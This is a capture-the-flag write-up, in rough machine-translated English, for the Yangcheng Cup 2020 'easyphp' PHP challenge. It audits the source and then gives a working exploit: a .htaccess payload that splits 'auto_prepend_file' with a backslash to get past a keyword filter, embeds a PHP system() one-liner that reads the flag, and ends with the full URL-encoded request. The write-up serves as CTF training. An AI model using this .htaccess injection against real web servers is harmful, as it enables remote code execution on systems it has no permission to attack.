[Yangcheng cup 2020] easyphp

<?php 
    $files = scandir('./');  
    foreach($files as $file) { 
        if(is_file($file)){ 
            if ($file !== "index.php") { 
                unlink($file); 
            } 
        } 
    } 
    if(!isset($_GET['content']) || !isset($_GET['filename'])) { 
        highlight_file(__FILE__); 
        die(); 
    } 
    $content = $_GET['content']; 
    if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) { 
        echo "Hacker"; 
        die(); 
    } 
    $filename = $_GET['filename']; 
    if(preg_match("/[^a-z\.]/", $filename) == 1) { 
        echo "Hacker"; 
        die(); 
    } 
    $files = scandir('./');  
    foreach($files as $file) { 
        if(is_file($file)){ 
            if ($file !== "index.php") { 
                unlink($file); 
            } 
        } 
    } 
    file_put_contents($filename, $content . "\nHello, world"); 
?>

Code audit

$files = scandir('./');  
    foreach($files as $file) { 
        if(is_file($file)){ 
            if ($file !== "index.php") { 
                unlink($file); 
            } 
        } 
    } 
 If not index.php page , Page data will be deleted 

if(!isset($_GET['content']) || !isset($_GET['filename'])) { 
        highlight_file(__FILE__); 
        die(); 
    } If no incoming content or filename Parameters are directly die

$content = $_GET['content']; 
    if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) { 
        echo "Hacker"; 
        die(); 
    } 

 Pass in parameters content To filter , Not by on html type flag upload file

$filename = $_GET['filename']; 
    if(preg_match("/[^a-z\.]/", $filename) == 1) { 
        echo "Hacker"; 
        die(); 
    } 

 Pass in parameters filename To filter ,filename Only lowercase letters and . constitute , otherwise die

$files = scandir('./');  
    foreach($files as $file) { 
        if(is_file($file)){ 
            if ($file !== "index.php") { 
                unlink($file); 
            } 
        } 
 Just like the initial filtering , If not index.php The data will be deleted 

 file_put_contents($filename, $content . "\nHello, world"); 

 Put our incoming content content write in filename Inside 
 But notice that there is a splice here Hello world, It will cause our program to report errors 

The original idea was filename by a.php,content Pass in a sentence , Result practice ：

Discover as html Output directly on the page , There's no resolution , Maybe only parsing is set in the background index.php, After all, the code is right index.php There are many reminders , So I wonder if I can index.php We analyzed our htaccess, Just change the configuration item , So the learning boss learned that he really wanted to use htaccess To get flag 

php_value auto_prepend_fil\
e .htaccess
#<?php system('cat /fla?');?>\

 htaccess in \ The function of is to splice context , amount to php_value auto_prepend_file.htaccess

Because in order to bypass the filter, from file In the middle

  Among them, the use of annotations # Write a sentence into , Because in htaccess Is the function of the annotator , But in php When it comes to execution , In a word, the Trojan horse will be executed

In the third line \ It is for splicing with the last part of the code Hello,world Also as a note , otherwise hello world Go to the fourth line to report an error

?filename=.htaccess&content=php_value%20auto_prepend_fil%5C%0Ae%20.htaccess%0A%23%3C%3Fphp%20system('cat%20/fla?')%3B%3F%3E%5C